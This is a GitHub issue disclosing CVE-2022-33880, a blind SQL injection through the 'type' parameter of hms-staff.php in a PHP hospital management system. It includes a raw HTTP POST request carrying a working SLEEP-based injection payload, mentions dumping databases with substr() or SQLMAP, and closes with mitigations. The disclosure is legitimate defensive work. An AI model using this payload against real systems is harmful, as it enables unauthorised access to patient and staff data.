Headline
CVE-2022-33880: Vulnerability/BUG - Unauthenticated bind boolean based sql injection via type parameter on hms-staff.php page · Issue #7 · projectworldsofficial/hospital-management-system-in-php
hms-staff.php in Projectworlds Hospital Management System Mini-Project through 2018-06-17 allows SQL injection via the type parameter.
Hi
I found a SQL injection vulnerability in your hospital management system.
Page Request:-
POST /hospital/hms-staff.php HTTP/1.1
Host: 192.168.0.107
Content-Length: 43
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: PHPSESSID=t8e8smm8d836b7lar1qb6l3avf
Connection: close
email=username&password=password&type=admin+WHERE+1=1+AND+SLEEP(10)--+-
The above query will only sleep the database for 10 seconds. Since it’s a blind boolean-based injection, an attacker can dump all the databases using the substr()method or using the SQLMAP tool.
Affect URL: http://127.0.0.1/hms-staff.php****Afftect Parameter: type****Payload: admin+WHERE+1=1+AND+SLEEP(10)–±****Mitigation:
- Performing Whitelist Input Validation
- Use of Prepared Statements (with Parameterized Queries)